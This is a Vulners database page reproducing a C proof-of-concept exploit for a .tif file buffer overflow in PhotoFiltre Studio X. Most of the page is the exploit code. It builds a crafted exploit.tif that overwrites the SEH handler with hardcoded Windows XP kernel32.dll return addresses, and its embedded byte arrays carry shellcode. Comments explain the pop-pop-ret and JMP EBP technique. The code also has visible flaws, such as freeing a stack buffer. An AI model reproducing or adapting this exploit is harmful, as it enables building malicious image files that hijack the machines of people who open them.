Vulners
Lucene search
PhotoFiltre Studio X - .tif Local Buffer Overflow
#include<stdio.h>
#define fisier FILE
#define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)
#define VER "10.3.0"
#define POCNAME "[*]PhotoFiltre Studio X .tif file local buffer overflow poc(0day)"
#define AUTHOR "[*]fl0 fl0w"
typedef char i8;
typedef short i16;
typedef int i32;
void gen_random(i8*,const int);
void print(i8*);
i32 mcpy(void*,const void*,i32);
void fwi32(fisier*,i32);
i32 filerr(fisier*);
void error(void);
void filebuild();
unsigned int getFsize(fisier*,i8*);
i32 sizes[]={257,163,217,213,940,29};
typedef struct {
/*Retcodes from MS Windows xp pro sp3
*/
i32 popopret;
i32 jmpbyte;
i32 jmpEBP;
}instr;
i32 main()
{filebuild();
printf("%s\n%s\n",POCNAME,AUTHOR);
print("file done");
getchar();
}
void filebuild() {
/*The logic: overwrite seh handler with pop pop ret,overwrite next seh with
jmp ebp,find the exact location ebp points to and write a jmp 0x40 bytes instr.
Because there isn't space for shellcode I chose this jmp ebp option.
And a egghunter wouldn't be the solution because u also need space for it.
*/
i8 tif1[]= {
0x49, 0x49, 0x2A, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x00, 0xFE, 0x00, 0x04, 0x00, 0x01, 0x00,
0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFD, 0x01,
0x00, 0x00, 0x01, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xB6, 0x01, 0x00, 0x00, 0x02, 0x01,
0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x03, 0x01, 0x03, 0x00, 0x83, 0x00,
0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x06, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00,
0x00, 0x00, 0x0A, 0x01, 0xB6, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x11, 0x01,
0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0x22, 0x01, 0x00, 0x00, 0x12, 0x01, 0x03, 0x00, 0x01, 0x00,
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x15, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x16, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x01,
0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0xFE, 0x01, 0x00, 0x00, 0x1A, 0x01, 0x05, 0x00, 0x01, 0x00,
0x00, 0x00, 0xDA, 0x02, 0x00, 0x00, 0x1B, 0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0xE2, 0x02,
0x00, 0x00, 0x1C, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x01,
0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x29, 0x01, 0x03, 0x00, 0x02, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x43, 0x43, 0xEB, 0x05, 0x8C, 0x08, 0xFC, 0x7F, 0x43, 0x55, 0x89,
0xE5, 0x83, 0xEC, 0x18, 0xC7, 0x45, 0xFC, 0x77, 0x7A, 0x83, 0x7C, 0xC7, 0x44, 0x24, 0x04, 0xD0,
0x03, 0x00, 0x00, 0xC7, 0x04, 0x24, 0x01, 0x0E, 0x00, 0x00, 0x8B, 0x45, 0xFC, 0xFF, 0xD0, 0xC9,0xC3,
};
i8 tif2[]= {
0x92, 0x00, 0x92, 0x00, 0x96, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x00, 0x00,
0x92, 0x00, 0x49, 0x00, 0x12, 0x00, 0x92, 0x00, 0xAF, 0x00, 0x92, 0x00, 0x49, 0x00, 0x49, 0x00,
0x49, 0x00, 0x58, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x58, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
0x57, 0x00, 0x12, 0x00, 0x5A, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x12, 0x00,
0x00, 0x00, 0x46, 0x00, 0xFD, 0x00, 0xD5, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xEF, 0x00, 0xA9, 0x00,
0xD9, 0x00, 0x00, 0x00, 0x70, 0x00, 0x6C, 0x00, 0xFA, 0x00, 0x99, 0x00, 0xC5, 0x00, 0xF7, 0x00,
0xB4, 0x00, 0x48, 0x00, 0xAB, 0x00, 0xE9, 0x00, 0xDE, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xD7, 0x00,
0x64, 0x00, 0xA9, 0x00, 0xD9, 0x00, 0x6E, 0x00, 0x68, 0x00, 0x70, 0x00, 0x92, 0x00, 0xCC, 0x00,
0xF2, 0x00, 0x99, 0x00, 0x94, 0x00, 0xE9, 0x00, 0xAD, 0x00, 0xB4, 0x00, 0x4B, 0x00, 0xC9, 0x00,
0x85, 0x00, 0xE9, 0x00, 0xE5, 0x00, 0xB4, 0x00, 0x80, 0x00, 0x98, 0x00, 0x8C, 0x00, 0xE0, 0x00,
0xC4, 0x00, 0x33,
};
/* tif1sz=v[1]
tif2sz[]=v[2]
sehoffset=v[3]
nsehoffset=v[4]
junksz=v[5]
jmpebpoffset=v[6] */
fisier* in=fopen("exploit.in","r"),
* out=fopen("exploit.tif","wb");
//i8 buf=ALOC(i8,100001);
i8 buf[100001];
instr* ASM;
ASM=ALOC(instr,sizeof(instr));
ASM->popopret=0x7C86CFC2;//pop esi pop edi ret from kernel32.dll
ASM->jmpbyte=0xeb400300;//jmp over(u need to cause a exception NOT a exit call,so work on the instr)
ASM->jmpEBP=0x7C81ACD3;//JMP EBP from kernel32.dll
memcpy(tif1+217,&ASM->popopret,4);
memcpy(tif1+213,&ASM->jmpEBP,4);
memcpy(tif1+29,&ASM->jmpbyte,4);
if(out){
fwrite(tif1,sizeof(i8),sizeof(tif1),out);
gen_random(&buf,940);
fwrite(&buf,sizeof(i8),940,out);
fwrite(tif2,sizeof(i8),sizeof(tif2),out);
fclose(out);
free(buf);
}
else {
error();
}
}
void error(void) {
perror("\nError:");
}
i32 filerr(fisier* F) {
return (ferror(F));
}
void readf(void) {
}
void fwi32(fisier* F,i32 adr) {
fputc(adr&0xff,F);
fputc((adr>>8)&0xff,F);
fputc((adr>>16)&0xff,F);
fputc((adr>>24)&0xff,F);
}
i32 mcpy(void* dest,const void* source,i32 len)
{ void* D=dest;
const void* S=source;
len=sizeof(source);
memcpy(D,S,len);
return (len);
}
void print(i8* msg)
{
printf("[*]%s\n",msg);
}
void gen_random(i8* s,const int len)
{ i32 i;
static const i8 alphanum[]= {
"0123456789ABCDEFGHIJKLMNOPQRST"
"UVWXYZabcdefghijklmnopqrstuvwxyz"};
for(i=1;i<len;++i)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 May 2010 00:00Current
0.7Low risk
Vulners AI Score0.7